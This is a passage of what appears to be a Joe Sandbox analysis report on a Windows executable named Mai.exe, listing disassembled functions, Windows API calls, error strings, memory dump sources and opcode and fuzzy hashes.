                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3896166516-3733052814
                                                            • Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                            • Instruction ID: 398ee3a9c23287896ebaefb361f8dd186448ae3733d5b42ea6b1abe0143d9371
                                                            • Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                            • Instruction Fuzzy Hash: 85518B32D082C286EB64AF21914437C77A0EB54B94F144136DA9D87BD7EF3CE4B4AB80
                                                            Function 00007FF6DD652890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 1878133881-2410924014
                                                            • Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                            • Instruction ID: 78d0d43c9c76662688de2e286167d27e4594e203d4f584e312b0fd3d32e4a2ee
                                                            • Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                            • Instruction Fuzzy Hash: 35316772E286C291E620FB14E4516EE6354FF847C4F804137E68D87A9AEF3CD655DB80
                                                            Function 00007FF6DD653EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD653EF1
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastMessageModuleName
                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                            • API String ID: 2581892565-1977442011
                                                            • Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                            • Instruction ID: cb2db3001cdce4a13430c057c362b5a3f49a1041a5bedf48d359e77cccca83c4
                                                            • Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                            • Instruction Fuzzy Hash: 81018461F2D6C6A1FE60B724E8553BD1261AF5CBC8F800437D84DC6693FE1CE1A5A790
                                                            Function 00007FF6DD66CB60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                            • String ID:
                                                            • API String ID: 2718003287-0
                                                            • Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                            • Instruction ID: 7b44d1be9db94310ba5bb99df5c355feec16dc363d64bc43d8e9cf77241f2931
                                                            • Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                            • Instruction Fuzzy Hash: 3BD10572F18A818AE710EFB5D8401AC3B71FB84798F014276DE5D97B89EE38D426D380
                                                            Function 00007FF6DD652330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$DialogInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1956198572-0
                                                            • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                            • Instruction ID: 5453d7363ba971c08e60512e1cabe4bb24ab8eb95601b302a85e713cfb6eb2ba
                                                            • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                            • Instruction Fuzzy Hash: 7711A921E081C682FB54AB69F54467D1391EF88B90F548032DA494AB9FEE2CE8E16640
                                                            Function 00007FF6DD65C460 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                            • Instruction ID: abd122a30492487297c398789d2e749bc2c7cafcc187e6ca94af4c4229a10d52
                                                            • Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                            • Instruction Fuzzy Hash: BD115122F15F4599EB00DFA4E8542BD33A4F719758F040E32DA7D86BA4EF78E5A49380
                                                            Function 00007FF6DD67628C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                            • String ID: ?
                                                            • API String ID: 1286766494-1684325040
                                                            • Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                            • Instruction ID: 8991e7e9b23fd172d6de057242bfd5e9f814f69f8234eead233f31bdf448ded3
                                                            • Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                            • Instruction Fuzzy Hash: 6A41F522E182C676F760AB65D44137E5650EB80BA4F144237EF5C86ED5FE3CD461D780
                                                            Function 00007FF6DD6695A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD6695D6
                                                              • Part of subcall function 00007FF6DD66AF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                              • Part of subcall function 00007FF6DD66AF0C: GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6DD65BFE5), ref: 00007FF6DD6695F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\Mai.exe
                                                            • API String ID: 2553983749-3878141378
                                                            • Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                            • Instruction ID: 617c91fb83c9bd972549e5187c92c442b5bd0465659402e24ff567c4b640f87a
                                                            • Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                            • Instruction Fuzzy Hash: 9A417C36E48B9286EB54EF2598510BC2794EB84790F544077EE4EC3B89EF3CE4A193C0
                                                            Function 00007FF6DD66D1F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: U
                                                            • API String ID: 442123175-4171548499
                                                            • Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                            • Instruction ID: b674495861ca36f45ba876f05a8dc9996685acf6277f6d79d6128ee86a3b1d0e
                                                            • Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                            • Instruction Fuzzy Hash: BB41B122E18AC592EB20EF65E4443AD6764FB98B94F404032EE4DC7798EF3CE455DB80
                                                            Function 00007FF6DD66F918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            • Opcode ID: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                            • Instruction ID: 49fa683fce1cbc9d6b0ba07a15d9cd228be5cc9815fb9d03097c98c810349aba
                                                            • Opcode Fuzzy Hash: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                            • Instruction Fuzzy Hash: 79212632E086C182EB20AB25D00527D73B1FB94B88F414137DA8D83289EF7CE959D7C1
                                                            Function 00007FF6DD652B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Fatal error detected
                                                            • API String ID: 1878133881-4025702859
                                                            • Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                            • Instruction ID: 292531adec5b8a74a06883c8e8e0f74f451c8398d62c1fc1951d06819177978e
                                                            • Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                            • Instruction Fuzzy Hash: 2521B772A286C691E720EB14F4506EE6354FF84784F805137E68D87A66EF3CD265DB40
                                                            Function 00007FF6DD652C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Error detected
                                                            • API String ID: 1878133881-3513342764
                                                            • Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                            • Instruction ID: 1ec57a0ad0dc5eea6f0df56d2f99b1bec9ed4f6f40ef7c1990fc6390cd9e6e34
                                                            • Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                            • Instruction Fuzzy Hash: 6921B772A286C691E720EB14F4506FE6354FF84788F805137E68D87A65EF3CD265DB80
                                                            Function 00007FF6DD65FE80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFileHeaderRaise
                                                            • String ID: csm
                                                            • API String ID: 2573137834-1018135373
                                                            • Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                            • Instruction ID: ea423dfe3818541cda3d818b7057aa4b85fa25b19e0572fcf1274f2be3b0ae25
                                                            • Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                            • Instruction Fuzzy Hash: F9115E32A18B8592EB609B29F44026D77E0FB88B84F584235DF8C47B59EF3CD9658740
                                                            Function 00007FF6DD67041C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                            • String ID: :
                                                            • API String ID: 2595371189-336475711
                                                            • Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                            • Instruction ID: 707f70c71b0563449cb63fbf616276794da8e00826c71e16886524536f9cefce
                                                            • Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                            • Instruction Fuzzy Hash: 0B018421E1828696FB20BF60D46127E23B0EF44745F400037D54DC6A95FF2CE564EAA4

                                                            Executed Functions

                                                            Function 00007FFB4B3807B5 Relevance: 1.7, Instructions: 1691COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dbf0d6a46980928a6b76a477039100f9260ac93c7176b461e10c45b6e11b71db
                                                            • Instruction ID: 30b3f2a3a5a6ace64a373e2ebae1fb9d2d91a0c1a929d26ca433849c1bcbc979
                                                            • Opcode Fuzzy Hash: dbf0d6a46980928a6b76a477039100f9260ac93c7176b461e10c45b6e11b71db
                                                            • Instruction Fuzzy Hash: 47E254B4E19515CFFB85EBA8D492FAD77A5FB49B10F2045A4D409833C3C938B845CBA2
                                                            Function 00007FFB4B380815 Relevance: 1.7, Instructions: 1673COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 38bc752dd241a27dd08b7e532fe4cbee255d8c3c2a538b029629ce79d474e3e0
                                                            • Instruction ID: 807a09b5f0e9d73e7626402c9e6586ae28f9b0c8d7f8d20f21114af726c62b26
                                                            • Opcode Fuzzy Hash: 38bc752dd241a27dd08b7e532fe4cbee255d8c3c2a538b029629ce79d474e3e0
                                                            • Instruction Fuzzy Hash: 14E255B4E19515CFFB85EBA8D492FAD77A5FB49B10F6005A4D409833C3C938B845CBA2
                                                            Function 00007FFB4B383870 Relevance: .6, Instructions: 583COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07c41e3caad1c4053ec5556ac17f7b475f4271d8623895d924667edd5562260c
                                                            • Instruction ID: 504b30dd0d544dc3735970208babb2b2abd7becbc40026f4cb0b357481b4ef14
                                                            • Opcode Fuzzy Hash: 07c41e3caad1c4053ec5556ac17f7b475f4271d8623895d924667edd5562260c
                                                            • Instruction Fuzzy Hash: EB710CA1E1EA850FFB56BB78D4152B96BE1EF95300F1450BAE44DC32E3DD18AC098356
                                                            Function 00007FFB4B3838BF Relevance: .5, Instructions: 525COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3bb2595a1b1172e3d0033237a1c4a597f7d88d637d02cad6725087a702926a83
                                                            • Instruction ID: ad5530e2f45a69ce50198649c5793c93f43eeb20b039b518c3053b396af2d00e
                                                            • Opcode Fuzzy Hash: 3bb2595a1b1172e3d0033237a1c4a597f7d88d637d02cad6725087a702926a83
                                                            • Instruction Fuzzy Hash: 1351EBA1A1DA450FFB5ABB38D4152F977E1EF95310F0450BAE44DC36E3DD18AC098386
                                                            Function 00007FFB4B382DD8 Relevance: .2, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b362dbeb20590cc4b24744956bce1ef80df7609c55e9bc1553b11fc8084c93b
                                                            • Instruction ID: 7327c291dc01526d4e1955aa041bedc9e15427f59a915fdf502e0345881ffb72
                                                            • Opcode Fuzzy Hash: 3b362dbeb20590cc4b24744956bce1ef80df7609c55e9bc1553b11fc8084c93b
                                                            • Instruction Fuzzy Hash: 2741B5C3D1E7C20FFB56AA7D9D661646FD0EF5365071880FAD1C88A4E79818A80A8397
                                                            Function 00007FFB4B381F99 Relevance: .1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 751ac2f91d4a005bacac52731459c914318253f6bf38cfa7efb6245e4caf5df7
                                                            • Instruction ID: e055298c2459fa31ad5253d78eade99a195113761e5239db8af4612057a849e7
                                                            • Opcode Fuzzy Hash: 751ac2f91d4a005bacac52731459c914318253f6bf38cfa7efb6245e4caf5df7
                                                            • Instruction Fuzzy Hash: F851ADE0C1C2865AFF96FF35CA557B93BD0EF86308F048175D649822E3CE682894CA53
                                                            Function 00007FFB4B3829D9 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
